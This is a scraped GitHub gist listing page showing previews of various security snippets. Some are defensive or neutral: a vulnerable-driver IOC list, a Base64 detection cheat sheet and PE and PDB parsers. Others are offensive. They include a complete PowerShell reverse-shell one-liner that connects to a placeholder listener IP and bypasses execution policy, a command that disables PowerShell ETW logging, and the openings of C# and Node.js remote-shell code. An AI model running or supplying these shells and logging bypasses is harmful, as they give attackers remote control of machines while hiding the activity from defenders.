Skip to content

Instantly share code, notes, and snippets.

View GetRektBoy724's full-sized avatar
💀
goofy ahh

Hannn GetRektBoy724

💀
goofy ahh
  • Indonesia
View GitHub Profile
@k4nfr3
k4nfr3 / ioc_vulnerable_drivers.csv
Last active March 28, 2024 07:43
IOC vulnerable drivers
We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 4 columns, instead of 2 in line 8.
SHA256,Name,Signer,Description
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys
@MircoBabin
MircoBabin / ReadingPortableExecutable_PE_header.cs
Last active June 3, 2021 13:02 — forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C# - reading Import Directory Table to e.g. determine Microsoft VC Runtime version
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace peheader
{
//https://gist.github.com/caioproiete/b51f29f74f5f5b2c59c39e47a8afc3a3
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active October 15, 2024 21:14
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" <. Often used by Emotet (UTF-16)
@nathan130200
nathan130200 / MessageBox.cs
Created July 14, 2019 18:39
C# user32.dll MessageBox Raw implementation without System.Windows.Forms (based on https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messagebox)
namespace User32
{
public static class MessageBox
{
[DllImport("user32.dll")]
static extern int MessageBoxA(IntPtr hWnd,
string lpText,
string lpCaption,
uint uType);
@BankSecurity
BankSecurity / Simple_Rev_Shell.cs
Last active November 18, 2024 04:46
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@namazso
namazso / pdb_parser_lite.cpp
Created April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
*
* Copyright (c) namazso 2018
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
@ohpe
ohpe / RS.ps1
Last active October 14, 2024 19:46
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@tandasat
tandasat / KillETW.ps1
Last active November 12, 2024 13:31
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@roccomuso
roccomuso / Client.js
Last active February 19, 2023 21:19
Node.js remote shell example
var net = require('net')
var readline = require('readline')
/**
* @class Client
* @param host {String} the host
* @param post {Integer} the port
*/
function Client (host, port) {
this.host = host